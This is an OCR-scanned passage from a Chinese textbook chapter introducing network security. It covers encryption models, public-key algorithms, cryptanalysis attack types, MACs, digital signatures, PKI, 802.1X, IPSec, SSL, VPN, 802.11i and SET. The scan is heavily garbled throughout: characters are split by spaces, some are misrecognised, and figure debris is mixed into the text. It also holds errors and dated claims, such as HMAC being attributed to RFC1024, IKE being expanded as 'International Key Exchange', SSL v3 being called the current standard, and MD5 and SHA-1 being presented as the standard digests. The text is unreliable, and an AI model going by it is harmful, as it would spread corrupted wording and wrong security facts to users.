(1) M: 明文 消息 空间 ,是 所 有 明文 的 有 限 集合 。 

(2) C: 密 文 消息 空间 ,是 所 有 密 文 的 有 限 集合 。 

(3) Ki,Ks: 所 有 加 密 和 解密 密 钥 构成 的 有 限 集合 。 

(4) En : 加 密 变换 ,对 于 任意 mE€EM, 存 在 cEC, 使 得 En (m)=c 成 立 , 其 中 ALERK， 。 

(5) Di : 解密 变换 ,其 中 k2E€ K, ,对 任意 cEC 且 c==En(m) ,使 得 Dis(c) 二 m 成 立 。 

对 于 给 定 的 明文 消息 m 和 和 密 钥 &1, 加 密 变 换 En 把 m 变换 成 c, 再 由 解密 变换 Ds 把 
c 恢复 成 mm。 
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图 1-8 保密 通信 系统 的 一 般 模型 


密码 体制 是 指 加 密 系 统 采用 的 基本 工作 方式 ,由 加 密 /解密 算法 和 密 钥 组 成 ,按照 加 
密 密 钥 是 否 可 以 公开 ,分 为 对 称 加 密 体制 和 非 对 称 加 密 体制 两 大 类 ,也 称 为 单 钥 和 双 钥 体 
制 。 对 称 加 密 指 加 密 和 解密 使 用 相同 的 密 钥 ,如 DES、AES 算法 等 。 非 对 称 加 密 指 加 密 
和 解密 密 钥 使 用 不 同 的 密 钥 , 即 公 钥 和 私 钥 两 个 密 钥 ,它们 必须 配对 使 用 。 公 钥 可 以 公 
开 , 收 件 人 解密 只 需要 自己 的 私 钥 即 可 ,因此 避免 了 密 钥 的 传输 安全 性 问题 ,目前 主要 的 
公 钥 密 钥 算法 有 D-H 算法 `RSA 算法 和 椭圆 曲线 算法 等 。 
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2. 数据 加 /解密 技术 

1) 加 密 算法 

加 密 算法 可 分 为 对 称 密 钥 算法 、 公 钥 算 法 、 散 列 算法 (消息 摘要 ) 等 。 

对 称 密 钥 算法 的 双方 共享 同一 个 密 钥 ,是 当前 广泛 采用 的 常规 密码 体制 ,经典 算法 包 
括 DES 和 IDEA 等 ,AES 算法 是 目前 的 美国 加 密 标 准 。 对 称 加 密 算 法 的 发 展 趋势 是 分 
组 加 密 , 巾 密 钥 扩展 算法 和 加 /解密 算法 两 部 分 组 成 , 它 的 基本 设计 原则 是 混乱 和 密 钥 扩 
散 , 能 够 抵御 已 知 明文 的 差分 和 线性 攻击 , 且 易 于 各 种 硬 软 件 实现 。 

公 钥 算法 要 求 通信 的 一 方 拥有 别人 不 知道 的 私有 密 钥 , 同 时 可 以 向 所 有 人 公布 一 个 
公开 密 钥 。 发 送 者 使 用 接收 者 的 公开 密 钥 对 数据 加 密 ,接收 者 使 用 自己 的 私 钥 解密 ,主要 
包括 : 

(1) Diffie-Hellman 算法 : 基于 有 限 乘法 群 的 离散 对 数 问 题 ,攻击 者 在 只 知 公 钥 不 知 
私 钥 的 情况 下 ,必须 求解 离散 对 数 问题 来 进行 破译 。 

(2) RSA 算法 : 最 经 典 的 公 钥 算法 , 它 建立 在 对 大 整数 的 分 解难 题 上 , 即 已 知 两 个 
大 素数 的 乘积 ,无 法 在 有 限时 间 内 计算 两 个 素数 的 值 。 

(3) 椭圆 曲线 算法 : 把 椭圆 曲线 上 点 群 的 离散 对 数 问 题 应 用 到 密码 学 中 , 它 在 已 知 
的 公 钥 算法 中 ,对 每 比特 所 提供 的 加 密 强度 最 高 。 

散 列 算法 是 一 种 使 用 摘要 函数 的 防 自 改 方法 。 摘 要 函数 满足 : 

(1) 对 任意 长 度 的 输入 ,输出 固定 长 度 的 摘要 。 

(2) 如 果 改 变 了 输入 的 任何 比特 ,输出 的 摘要 会 发 生 不 可 预测 的 改变 , 即 输入 的 每 一 
位 对 最 终 摘要 都 有 影响 。 

目前 广泛 使 用 的 摘要 函数 是 MD5 和 SHA-1。 

2) 网 络 加 密 方式 

网 络 通信 可 在 通信 的 三 个 不 同 层次 实现 加 密 , 即 链 路 加 密 .节点 加 密 和 端 到 端 加 密 。 

链 路 加 密 指 在 链 路 两 端 对 数据 报 文 的 每 一 位 都 进行 加 密 , 通 过 在 各 链 路 采用 不 同 的 
加 密 密 钥 对 信息 提供 安全 保护 。 当 报 文 传递 到 某 个 中 间 节 点 时 ,必须 解密 以 获得 路 由 信 
息 和 校 验 和 ,进行 路 由 选择 和 差错 校 验 ,然后 再 加 密 发 给 下 一 个 节点 ,直到 目的 节点 为 止 。 
由 于 每 条 链 路 两 端 共享 一 个 密 钥 ,在 网 络 互联 时 ,需要 提供 很 多 密 钥 , 因 此 通常 用 于 对 局 
部 数据 的 保护 。 

节点 加 密 即 在 中 间 节 点 中 装 有 加 /解密 保护 装置 ,由 这 个 装置 完成 不 同 链 路 的 密 钥 切 
换 工 作 。 这 样 ,明文 只 会 出 现在 保护 装置 中 ,中 间 节 点 的 其 他 部 分 都 不 会 出 现 明文 , 相 比 
链 路 加 密 更 安全 。 但 是 , 它 需 要 修改 网 络 交换 节点 ,增加 保护 装置 ; 另外 ,节点 加 密 要 求 
报头 和 路 由 信息 以 明文 传输 .容易 受到 攻击 。 

端 到 端 加 密 指 在 通信 线路 两 端 进行 加 密 , 数 据 在 发 送 端 进行 加 密 , 然 后 密 文 穿 过 互联 
网 到 达 目 的 端 ,最 后 才 解 密 恢复 成 明文 数据 。 由 于 目的 端 和 发 送 端 共享 一 个 密 钥 , 端 到 端 
加 密 还 提供 一 定 程度 的 认证 。 端 到 端 加 密 在 传输 层 或 应 用 层 上 实现 ,不 对 网 络 层 以 下 协 
议 信息 加 密 , 因 此 会 受到 流量 分 析 的 攻击 。 

可 以 将 链 路 加 密 和 端 到 端 加 密 相 结合 以 提高 安全 性 , 链 路 加 密 对 协议 信息 进行 加 密 ， 
端 到 端 加 密 为 数据 传输 提供 保护 。 


第 1 章 概述 四 
3) 密码 分 析 


密码 分 析 指 在 不 知道 解密 密 钥 的 情况 下 ,对 加 密 信息 进行 解密 ,其 目标 是 寻找 密码 算 
法 的 弱点 ,并 根据 这 些 弱点 对 密码 进行 破译 ,其 手段 分 为 以 下 几 种 类 型 ; 

(1) 唯 密 文 攻击 : 破译 者 已 知 加 密 算 法 和 待 破解 的 密 文 ,密码 分 析 的 任务 是 恢复 尽 
可 能 多 的 明文 ,或 者 推导 出 加 密 密 钥 。 

(2) 已 知 明文 攻击 : 已 知 加 密 算 法 .一定 数量 的 密 文 以 及 对 应 的 明文 ,密码 分 析 的 任 
务 是 推导 出 密 钥 ,或 者 推导 出 一 个 算法 ,此 算法 可 解密 用 该 密 钥 加 密 的 任何 信息 。 

(3) 选择 明文 攻击 : 已 知 加 密 算法 、 在 选 定 明文 时 可 以 知道 对 应 的 密 文 ,密码 分 析 的 
任务 是 推导 出 密 钥 , 或 者 推导 出 一 个 算法 ,此 算法 可 解密 用 该 密 钥 加 密 的 任何 信息 。 

(4) 选择 密 文 攻击 : 已 知 加 密 算法 、 在 选 定 密 文 时 可 以 知道 对 应 的 明文 ,密码 分 析 的 
任务 是 推导 出 密 钥 ,或 者 推导 出 一 个 算法 ,此 算法 可 解密 用 该 密 钥 加 密 的 任何 信息 。 

(5) 自 适 应 选择 明文 攻击 : 选择 明文 攻击 的 特殊 情况 ,不 仅 能 选择 被 加 密 的 明文 ,还 
能 基于 加 密 的 结果 对 选择 的 明文 进行 修正 。 

一 般 最 常见 的 是 已 知 明文 攻击 和 选择 明文 攻击 ,而 一 个 密码 系统 如 果 能 抵抗 选择 明 
文 攻击 ,那么 它 一 定 能 够 抵抗 唯 密 文 攻击 和 已 知 明文 攻击 。 

3. 认证 技术 

认证 指 用 于 验证 所 传输 的 数据 的 完整 性 的 过 程 ,一 般 可 分 为 消息 认证 和 身份 认证 两 
种 技术 。 消 息 认 证 用 于 保证 信息 的 完整 性 和 不 可 否认 性 ,覆盖 加 /解密 和 数字 签名 等 内 
容 , 它 可 以 检测 信息 是 否 被 第 三 方 自 改 或 伪造 。 身 份 认证 包括 身份 识别 和 身份 验证 ( 见 
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在 网 络 通信 环境 中 ,可 能 有 下 述 攻 击 : 

(1) 泄密 : 消息 泄露 给 没有 合法 密 钥 的 实体 。 

(2) 流量 分 析 : 分 析 通 信 双 方 的 通信 模式 ,包括 连接 的 频率 、 持 续 时 间 、 消 息 数 量 和 
消息 长 度 等 。 

(3) 伪装 : 向 网 络 中 插入 一 条 伪造 信息 ,包括 伪造 应 答 。 

(4) 自 改 : 对 消息 内 容 的 插入 、 删 除 、 转 换 和 修改 。 

(5) 顺序 修改 : 对 消息 顺序 的 修改 和 重 排 。 

(6) 时 延 修改 : 对 消息 的 延 时 和 重 放 。 

(7) 否认 : 发 送 方 否认 发 送 消 息 或 接收 方 否认 收 到 消息 。 

泄密 和 流量 分 析 属 于 保密 性 范畴 ,数字 签名 和 消息 认证 可 以 防御 伪装 、 算 改 、 顺 序 修 
改 和 时 延 修改 等 攻击 ,数字 签名 还 可 以 防御 否认 攻击 。 总 的 来 说 ,消息 认证 就 是 验证 所 收 
到 的 消息 确实 是 来 自 真正 的 发 送 方 且 未 被 修改 ,也 可 验证 消息 的 顺序 和 及 时 性 。 

消息 认证 方法 包括 消息 认证 码 ,安全 散 列 函 数 和 数字 签名 三 大 类 。 对 称 加 密 算法 因 
为 通信 双方 共享 一 个 密 钥 ,也 能 提供 一 定 程 度 的 认证 功能 。 

1) 消息 认证 码 

消息 认证 码 (Message Authentication Code, MAC) 利 用 密 钥 来 生成 一 个 固定 长 度 的 
短 数据 块 ,并 将 该 数据 块 附 加 在 消息 后 ,与 消息 一 块 发 送 给 接收 方 。 接 收 方 对 收 到 的 消息 
用 相同 的 密 钥 进行 相同 计算 得 到 新 的 MAC, 并 与 收 到 的 MAC 进行 比较 ,如 果 不 同 则 可 
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判定 收 到 的 信息 被 纂 改 。 

MAC 的 应 用 场景 包括 : 

(1) 将 一 条 消息 发 送 给 多 个 接收 者 。 

(2) 信息 交换 时 ,一 方 没有 时 间 解 密 收 到 的 所 有 信息 , 它 随机 选择 信息 进行 认证 。 

(3) 不 需要 加 密 消 息 , 只 需要 消息 认证 。 

(4) 通信 时 需要 将 认证 和 保密 性 分 开 。 

由 于 收 、 发 双方 共享 密 钥 ,MAC 不 提供 数字 签名 功能 ,在 计算 MAC 时 可 以 采用 高 强 
度 的 对 称 加 密 算法 ,如 AES IDEA 等 。 

2) 安全 散 列 函数 

安全 散 列 函数 是 MAC 的 变形 , 它 不 使 用 密 钥 , 仅 生成 输入 消息 的 摘要 值 ,代表 函数 
是 MD5 和 SHA-1。 摘 要 值 用 于 消息 认证 的 几 种 方法 如 下 : 

(1) 用 对 称 加 密 将 消息 和 附加 在 后 的 摘要 值 加 密 ,不仅 提 供认 证 还 提供 保密 性 。 

(2) 用 对 称 加 密 仅 对 摘要 值 加 密 , 仅 提供 认证 。 

(3) 采用 公 钥 加 密 体制 ,使 用 发 送 方 的 私 钥 对 摘要 值 加 密 , 仅 提供 认证 。 

(4) 使 用 发 送 方 私 钥 对 摘要 值 加 密 ,然后 用 对 称 加 密 对 消息 和 加 密 后 的 摘要 值 加 密 ， 
不 仅 提 供认 证 还 提供 保密 性 。 

目前 ,流行 做 法 是 从 散 列 函数 中 开发 MAC ,因为 散 列 函数 的 执行 速度 比 传统 加 密 算 
法 快 ,并 且 散 列 函数 的 库 代码 广泛 可 用 。RFC1024 提出 了 基于 散 列 函数 的 MAC , 称 为 
HMAC, 它 的 优点 包括 : 

(1) 无 须 改动 直接 使 用 散 列 函数 。 

(2) 使 用 和 处 理 密 钥 简单 。 

(3) 移植 性 很 好 。 

(4) 保持 原 有 散 列 函数 的 性 能 。 

(5) 基于 散 列 函 数 的 合理 假设 .能 很 好 理解 和 分 析 认 证 机 制 的 密码 强度 。 

当 散 列 函 数 的 安全 性 受到 威胁 时 ,可 以 方便 地 用 更 安全 的 模块 或 函数 替换 它 。 

3) 数字 签名 

数字 签名 是 传统 签名 的 数字 化 ,建立 在 公 钥 加 密 体制 基础 上 ,涉及 散 列 函 数 功能 。 所 
谓 数字 签名 就 是 只 有 信息 发 送 方才 能 产生 、 别 人 无 法 伪造 的 一 串 字 符 , 同 时 它 也 是 对 发 送 
者 所 发 送信 息 真实 性 的 一 个 证 明 。 对 数据 进行 数字 签名 时 ,首先 界定 签名 的 数据 范围 , 然 
后 使 用 散 列 函数 计算 被 签名 数据 的 唯一 摘要 值 , 最 后 使 用 签名 者 的 私 钥 将 摘要 值 加 密 为 
数字 签名 ,得 到 的 数字 签名 对 于 被 签名 数据 和 私 钥 而 言 都 是 唯一 的 。 

数字 签名 的 具体 要 求 包括 : 

(1) 发 送 方 事 后 不 能 否认 发 送 的 报 文 签名 。 

(2) 接收 方 能 够 核实 发 送 者 发 送 的 报 文 签 名 。 

(3) 接收 方 不 能 伪造 发 送 方 的 报 文 签名 。 

(4) 接收 方 也 不 能 对 发 送 方 的 报 文 进行 部 分 自 改 。 

实现 数字 签名 有 多 种 方法 ,目前 采用 较 多 的 是 公 钥 加 密 技术 ,如 PKCS、DSA 、X. 509 
和 PGP 等 。 按 照 数字 签名 的 执行 方法 划分 ,可 分 为 直接 数字 签名 和 仲裁 数字 签名 。 
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直接 数字 签名 是 指数 字 签 名 的 执行 过 程 只 有 通信 双方 参与 ,并 假定 双方 有 共享 密 钥 
或 接收 方 知道 发 送 方 的 公 钥 。 数 字 签 名 使 用 发 送 方 的 私 钥 对 整个 消息 加 密 或 加 密 消息 的 
摘要 值 ,该 方案 的 缺点 是 安全 性 取决 于 发 送 方 密 钥 的 安全 性 ,发 送 方 可 能 声称 自己 的 密 钥 
丢失 ,自己 的 签名 是 他 人 伪造 的 。 

仲裁 数字 签名 可 以 解决 直接 数字 签名 的 缺陷 。 发 送 方 对 发 往 接收 方 的 消息 签名 后 ， 
将 消息 和 签名 先 发 给 仲裁 者 ,仲裁 者 对 消息 和 签名 认证 后 ,附加 一 个 表示 已 通过 认证 的 消 
息 , 一 同 发 给 接收 方 ,此 时 由 于 仲裁 方 的 存在 ,发 送 方 无 法 对 自己 发 出 的 消息 予以 否认 。 
整个 过 程 中 ,仲裁 方 必须 得 到 通信 双方 的 高 度 信 任 。 

4. 公 钥 基础 设施 (PKD) 

PKI 是 利用 公 钥 理论 和 技术 ,为 网 络 数据 和 其 他 资源 提供 信息 安全 服务 的 基础 设施 。 
广义 上 说 ,所 有 提供 公 钥 加 密 和 数字 签名 服务 的 系统 都 可 以 称 为 PRI。PKI 采用 证 书 管 
理 公 钥 ,通过 认证 机 构 (Certificate Authority,CA) 把 用 户 的 公 钥 和 其 他 标识 信息 绑 定 , 实 
现 用 户 身 份 验证 。 目 前 通常 采用 X. 509 数字 证 书 , 对 网 络 信息 进行 加 密 和 签名 ,保证 传 
输 的 保密 性 、 完 整 性 和 不 可 否认 性 ,从 而 实现 安全 传输 。 

PKI 很 好 地 解决 了 对 称 密码 技术 中 共享 密 钥 的 分 发 管理 问题 ,在 具有 加 密 数 据 功 能 
的 同时 也 具备 数字 签名 功能 ,目前 已 形成 一 套 完整 的 互联 网 安全 解决 方案 。 一 个 典型 的 
PKI 系统 如 图 1-9 所 示 ,其 包括 : 

(1) PKI 策略: 定义 密码 系统 使 用 的 处 理 方法 和 原则 ,包括 如 何 管理 证 书 、 如 何 管理 

(2) 认证 机 构 (CA): PKI 的 信任 基础 ,用 于 创建 发 布 .维护 、 撤 销 证 书 ,管理 公 钥 的 
整个 生命 周期 。 

(3) 注册 机 构 (RA): 提供 用 户 和 CA 之 间 的 接口 ,主要 功能 是 获取 并 认证 用 户 的 身 
份 ,向 CA 提出 证 书 申请 。 

(4) 证 书 /CRL 发 布 系统 : 提供 证 书 的 在 线 浏 览 .查询 和 用 户 注册 功能 。 

(5) PKI 应 用 接口 : 为 外 界 提 供 安全 服务 的 入 口 ,包括 公 钥 证 书 管理 接口 .CRL 的 发 
布 和 管理 接口 、 密 钥 备份 和 恢复 接口 、 密 钥 更 新 接口 等 。 


PKI 应 用 接口 



































认证 机 构 注册 机 构 证 书 /CRL 
(CA) (RA) 发 布 系统 
下 
PKI 策 略 








1-9 PKI 系 统 结构 
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作为 安全 基础 设施 ,PKI 能 为 不 同 的 用 户 按 不 同安 全 需求 提供 多 种 安全 服务 ,主要 包 
括 身份 认证 \ 数 据 完整 性 ,保密 性 、 不 可 否认 和 公证 服务 等 。 


1.3.5 网 络 安全 应 用 


1. 链 路 层 安 全 应 用 802. 1X 

802.1 X 属于 链 路 层 认证 机 制 , 它 是 一 种 基于 端口 的 接 入 控制 协议 ,目的 在 于 确定 连 
接 终端 的 端口 是 否 有 效 ,有 效 则 表示 交换 机 可 以 转发 从 该 端口 输入 /输出 的 数据 ,例如 对 
拨号 用 户 上 网 的 认证 过 程 就 是 确定 远程 用 户 接 入 设备 和 终端 之 间 语 音信 道 的 有 效 性 的 
过 程 。 

制定 802. 1X 协议 的 初衷 是 为 了 解决 无 线 局 域 网 用 户 的 接 入 认证 问题 ,IEEE 802. 3 
协议 定义 的 局 域 网 并 不 提供 接 入 认证 ,只 要 用 户 能 接 入 局 域 网 控制 设备 (如 交换 机 ) 就 可 
以 访问 局 域 网 中 的 设备 或 资源 。 随 着 局 域 网 接 入 在 电信 网 上 大 规模 开展 ,非常 有 必要 对 
交换 机 端口 加 以 控制 以 实现 用 户 级 的 接 入 控制 ,802. 1X 就 是 IEEE 为 了 解决 基于 端口 的 
网 络 接 人 控制 (Port-based Network Access Control) 而 制定 的 一 个 标准 。 

802. 1X 通过 扩展 认证 协议 (Extensible Authentication Protocol, EAP) 完 成 对 接 入 
用 户 的 认证 ,EAP 报 文 封装 成 局 域 网 的 帧 格式 (EAP over LAN,EAPOL) 在 用 户 和 认证 
者 之 间 传 输 , 支 持 802. 1X 的 局 域 网 主要 是 以 太 网 和 无 线 局 域 网 。 

802. 1X 根据 用 户 标识 或 设备 对 网 络 客 户 端 (或 端口 ) 进 行 鉴 权 , 它 采用 RADIUS( 远 
程 认 证 拨号 用 户 服务 ) 方 法 ,参与 者 分 为 三 个 不 同 小 组 : 请 求 方 认证 方 和 授权 服务 器 ,如 
图 1-10 所 示 。 












































认证 方 

和 授权 
请 求 方 | | 要 
1 EAPOL 人 


图 1-10 802. 1X 操作 模型 


端口 未 授权 时 ,只 有 EAP 报 文 和 广播 报 文 可 以 通过 端口 转发 ,只 有 授权 后 ,认证 方才 
会 对 请 求 方 的 数据 提供 正常 服务 。 

2. 网 络 层 安 全 应 用 IPSec 

IPSec 是 IETF 设计 的 一 种 端 到 端的 确保 IP 层 通信 安全 的 机 制 ,是 一 组 协议 集 ,其 中 
三 个 最 重要 的 协议 是 认证 头 (Authenticated Header, AH) 协 议 、 封 装 安 全 载荷 
(Encapsulated Security Payload, ESP) 协 议和 和 密 钥 交换 (International Key Exchange， 
IKE) 协 议 , 分 别 对 应 IP 安全 的 三 个 方面 : 认证 、 保 密 和 密 钥 管 理 。IPSec 的 协议 体系 结 
构 如 图 1-11 所 示 , 其 中 : 
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一 一 ”安全 体系 结构 













































































图 1-11 IPSec 体系 结构 


(1) AH 为 IP 报 文 提供 三 种 服务 : 

QO@ 数据 完整 性 验证 : 通过 使 用 散 列 函 数 产 生 的 验证 码 实现 ; 

@ 数据 源 身份 认证 : 通过 计算 验证 码 时 加 入 一 个 共享 的 会 话 密 钥 实现 ; 

@ 防 重 放 攻 击 : 在 AH 报头 中 加 入 序列 号 可 以 防止 重 放 攻 击 。 

(2) ESP 除了 提供 上 述 服务 外 ,还 提供 数据 加 密 服 务 。 

(3) IKE 负责 密 钥 管 理 ,定义 通信 双方 进行 身份 认证 ,协商 加 密 算法 以 及 生成 共享 密 
钥 的 方法 。 

(4) IKE 将 密 钥 协商 的 结果 保留 在 安全 关联 (Security Association,SA) 中 , 供 AH 和 
ESP 后 期 使 用 。 

(5) 解释 域 (Domain of Interpretation, Do 了 DD) 为 使 用 IKE 进行 协商 的 协议 统一 分 配 标 
识 符 , 包 括 协商 的 算法 、 协 议 标 识 符 ,以 及 有 关 参 数 解释 。 

IPSec 提供 了 在 局 域 网 、 广 域 网 ,专用 网 和 互联 网 中 安全 通信 的 功能 ,主要 用 途 包 括 
通过 安全 远程 接 入 、 安 全 的 企业 间 联 网 、 加 强 电子 商务 安全 性 。IPSec 有 下 列 优点 : 

(1) 在 路 由 器 和 防火 墙 中 使 用 IPSec 时 ,可 以 对 通过 边界 的 信息 流 提供 强 安全 性 。 

(2) 位 于 传输 层 之 下 ,对 所 有 的 应 用 透明 , 即 无 论 终端 是 否 使 用 IPSec, 对 上 层 软 件 和 
应 用 都 没有 影响 。 

(3) 对 终端 用 户 透 明 ,不 需要 对 用 户 进行 安全 机 制 的 培训 。 

(4) 可 以 给 个 人 用 户 提供 安全 性 。 

3. 传输 层 安 全 应 用 SSL 

安全 套 接 层 (Secure Socket Layer,SSL) 协 议 最 早 由 网 景 公司 (Netscape) 推 出 ,指定 
了 一 种 在 应 用 层 协议 和 TCP/IP 之 间 提 供 数 据 安全 性 的 机 制 ,为 TCP/IP 连接 提供 保密 
性 、 完 整 性 、 服 务 器 认证 和 可 选 的 客户 机 认证 ,主要 用 于 实现 Web 服务 器 和 浏览 器 之 间 的 
安全 通信 ,目前 的 工业 标准 是 SSL v3。 
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SSL 使 用 TCP 提供 一 种 可 靠 的 端 到 端 安全 服务 , 它 独 立 于 应 用 层 , 从 而 使 绝 大 多 数 
应 用 层 协议 都 可 以 直接 建立 在 SSL 之 上 。 它 的 目标 是 在 通信 双方 之 间 利用 加 密 的 SSL 
信道 建立 安全 连接 ,由 两 层 协议 组 成 ,如 图 1-12 所 示 。 

记录 协议 和 握手 协议 是 SSL 的 两 个 主要 























的 协议 。 i | | sm 
(1) SSL 记录 协议 为 应 用 层 协 议 提供 基本 

的 安全 服务 ,用 于 封装 更 高 层 的 协议 ,执行 数据 SSL 记 录 协 议 

的 安全 传输 , HTTP 一 般 在 SSL 的 记录 协议 的 

上 层 实现 。 Ee 
(2) 握手 协议 用 于 在 客户 机 和 服务 器 之 间 

建立 安全 连接 前 ,预先 建立 一 个 连接 双方 的 安 











全 通道 ,通过 特定 的 加 密 算法 互相 鉴别 。 图 1-12 SSL 协议 栈 

SSL 协议 将 基于 证 书 的 认证 方法 和 基于 口 
令 的 认证 方法 完美 结合 起 来 ,在 握手 时 ,必须 进行 服务 器 认证 ,但 是 不 需要 CA 实时 参与 ， 
也 无 须 查询 证 书 。 而 客户 机 认证 是 可 选 的 ,因为 可 以 在 建立 起 SSL 信道 后 ,再 用 协商 好 
的 会 话 密 钥 加 密 传输 口令 来 实现 客户 机 认证 。 

SSL 结合 对 称 加 密 和 公 钥 加 密 技术 ,在 握手 协议 中 使 用 公 钥 算法 在 客户 端 验证 服务 
器 的 身份 ,并 传递 客户 端 产 生 的 对 称 会 话 密 钥 ,然后 SSL 记录 协议 再 用 会 话 密 钥 来 加 / 解 
密 数据 ,实现 了 保密 性 .完整 性 和 身份 认证 服务 。 

4. 虚拟 专用 网 

虚拟 专用 网 (Virtual Private Network,VPN) 是 建立 在 公用 网 上 ,由 某 个 组 织 或 某 些 
用 户 专用 的 通信 网络 。 虚 拟 性 表现 在 任意 一 对 VPN 用 户 之 间 没 有 专用 物理 连接 ,而 是 
通过 公用 网 络 进行 通信 , 它 在 公用 网 络 中 建立 自己 专用 的 隧道 ,通过 这 条 隧道 传输 报 文 ， 
如 图 1-13 所 示 。 其 专用 性 表现 在 VPN 之 外 的 用 户 无 法 访问 VPN 内 部 的 网 络 资源 ， 
VPN 内 部 用 户 之 间 可 以 实现 安全 通信 。VPN 可 以 在 TCP/IP 体系 的 不 同 层次 上 实现 ， 
可 以 有 多 种 应 用 方案 。 

公 网 连接 通道 实现 VPN 的 关键 技术 包括 : 

(1) 隧道 技术 (Tunnel) 。 将 待 传输 的 信息 
经 过 加 密 和 协议 封装 处 理 后 ,再 柑 套 装 入 另 一 种 
协议 的 数据 报 文 , 送 入 网 络 像 普 通报 文 一 样 传 
输 。 相 当 于 在 公共 网 络 上 建立 一 条 数据 通道 ,只 
有 通道 两 端的 用 户 能 对 嵌 套 信息 进行 解释 和 处 
理 。 常见 的 隧道 技术 有 PPTP、L2TP、GRE、 





图 1-13 VPN 隧道 示意 图 


SSL、MPLS、SOCKS 和 IPSec 等。 

(2) 加 /解密 技术 。 基 于 已 有 的 加 /解密 技术 实现 保密 通信 。 

(3) 密 钥 管理 技术 。 建 立 隧 道 和 保密 通信 都 需要 密 钥 管理 技术 的 支撑 ,通常 采用 密 
钥 交换 协议 动态 分 发 ,包括 简单 密 钥 管理 (Simple Key Management for IP,SKMIP) 、 安 
全 密 钥 管理 协议 (ISAKMP) 等 。 
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(4) 身份 认证 技术 。 在 隧道 连接 开始 之 前 必须 确认 用 户 身份 。 

VPN 的 解决 方案 分 为 三 种 : 

(1) 内 联网 VPN(Intranet VPN)。 实 现 企业 内 部 各 个 局 域 网 的 安全 互联 ,在 互联 网 
上 建立 全 世界 范围 的 内 联网 VPN。 

(2) 外 联网 VPN(Extranet VPN) 。 实 现 企业 与 客户 .供应 商 之 间 的 互联 互通 。 它 需 
要 在 不 同 企业 内 部 网 之 间 组 建 ,需要 有 不 同 协 议和 设备 的 配合 以 及 不 同 的 安全 配置 。 

(3) 远程 接 入 VPN(Access VPN)。 实 现 企业 员工 的 远程 安全 办 公 , 用 户 既 能 获取 企 
业内 部 网 信息 ,又 要 能 保证 用 户 和 企业 内 网 的 安全 。 

5. 无 线 局 域 网 安全 协议 802. 11i 

802. 11 i 协议 细 化 了 IEEE 802. 11 无 线 局 域 网 的 安全 标准 ,包括 认证 数据 完整 性 、 
数据 保密 性 和 密 钥 管理 ,执行 的 操作 称 为 Wi-Fi 网 络 安 全 存 取 (Wi-Fi Protected Access， 
WPA) 标 准 ,目前 最 新 版 本 是 WPA2。802. 11i 的 最 终 形 式 称 作 健壮 安全 网 络 (Robust 
Security Network,RSN) , 它 的 安全 规范 定义 了 以 下 几 种 服务 : 

(1) 认证 : 定义 用 户 和 认证 服务 器 之 间 交 换 的 协议 ,能 够 相互 认证 ,并 产生 临时 密 
钥 , 用 于 通过 无 线 连 接 的 用 户 和 访问 接 入 点 之 间 通 信 。 

(2) 访问 控制 : 强制 使 用 认证 功能 ,帮助 密 钥 交 换 , 能 够 基于 认证 协议 工作 。 

(3) 完整 性 加 密 : MAC 层 数据 与 无 线 信号 的 完整 性 字段 一 起 加 密 ,保证 数据 没有 被 
算 改 。 

图 1-14 显示 了 用 来 支持 这 些 服务 的 安全 协议 。 
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图 1-14 IEEE 802. 11i 的 服务 与 协议 


802. 11i 主要 定义 了 两 种 加 密 协 议 ,分 别 是 临时 密 钥 完整 性 协议 (Temporary Key 
Integrated Protocol,TKIP) 和 计数 器 模式 密码 块 链 消息 完整 码 协议 (Counter CBC-MAC 
Protocol,CCMP) ,使 用 的 算法 分 为 以 下 三 类 。 

(1) 加 密 算法 : RC4、AES。 

(2) 完整 性 算法 : HMAC-SHA-1、.HMAC-MD5、Michael MIC、AES-CBC-MAC。 

(3) 密 钥 生成 算法 : HMAC-SHA-1。 

6. Web 安全 应 用 SET 

安全 电子 交易 (Secure Electronic Transaction ,SET) 是 目前 唯一 实用 的 保证 信用 卡 
数据 安全 的 应 用 层 安全 协议 。SET 协议 使 用 对 称 加 密 、 公 钥 加 密 、 数 字 信封 .数字 签名 、 
报 文摘 要 和 双重 签名 技术 ,保证 在 Web 环境 中 数据 传输 和 处 理 的 安全 性 ,协议 本 身 非常 
复杂 。 它 是 PKI 架构 下 的 典型 实现 ,提供 了 消费 者 、 商 家 和 银行 之 间 的 认证 ,确保 交易 数 
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据 的 完整 性 、 可 靠 性 和 不 可 否认 性 ,不 会 将 消费 者 卡号 等 信息 泄露 给 商家 。 

SET 应 用 系统 如 图 1-15 所 示 ,由 持 卡 人 、\ 商 家 、 支 付 网 关 、 认 证 中 心 链 、 发 卡 机 构 和 商 
家 结算 机 构 组 成 。 其 中 : 

(1) 商家 结算 机 构 : 负责 为 商家 建立 账户 ,认证 持 卡 人 用 于 消费 的 支付 卡 的 有 效 性 ， 
通过 和 发 卡 机 构 协 调 完 成 货款 支付 的 金融 机 构 。 

(2) 支付 网 关 : 实现 互联 网 和 支付 网 络 之 间 的 互联 ,实现 SET 消息 和 电子 转账 所 要 
求 的 消息 之 间 的 相互 转换 。 

(3) 认证 中 心 链 : 持 卡 人 、 商 家 、 支 付 网 关 、 商 家 结算 机 构 都 信任 的 证 书签 发 机 构 。 

(4) 发 卡 机 构 : 负责 向 持 卡 人 发 卡 并 开设 账户 的 机 构 ,如 银行 , 它 也 负责 向 商家 支付 









































持 卡 人 消费 的 金额 。 
持 卡 人 Internet 商家 
| 支付 网 关 [wi 和 儿 
支付 网 络 
发 卡 机 构 商家 结算 机 构 
图 1-15 SET 应 用 系统 
SET 的 目标 如 下 。 


(1) 保证 订货 和 支付 信息 的 保密 性 : 通过 加 密 保 证 只 有 合法 接收 者 才能 读 取 信息 ， 
同时 减少 冒充 持 卡 人 进行 交易 的 风险 。 

(2) 保证 数据 完整 性 : 保证 电子 交易 过 程 所 涉及 的 消息 是 未 被 算 改 的 。 

(3) 认证 持 卡 人 和 信用 卡 之 间 的 绑 定 关系 : 确认 持 卡 人 是 信用 卡 账户 的 合法 拥有 
者 ,使 用 数字 签名 技术 和 证 书 实现 。 

(4) 认证 商家 身份 : 确认 商家 身份 ,确认 和 商家 进行 的 电子 交易 是 安全 的 。 

(5) 确保 合法 参与 电子 交易 的 各 方 安全 : 加 密 、 认 证 机 制 保证 合法 参与 电子 交易 的 


各 方 的 安全 。 
(6) 安全 性 独立 于 传输 层 : 无 须 传输 层 提供 类 似 TLS 或 SSL 之 类 的 安全 传输 协议 ， 
就 可 实现 安全 性 。 


(7) 独立 于 传输 网 络 和 操作 系统 : SET 协议 和 报 文 格式 独立 于 传输 消息 的 网 络 , 独 
立 于 处 理 消息 的 硬件 平台 和 操作 系统 。 


1.4 小 结 





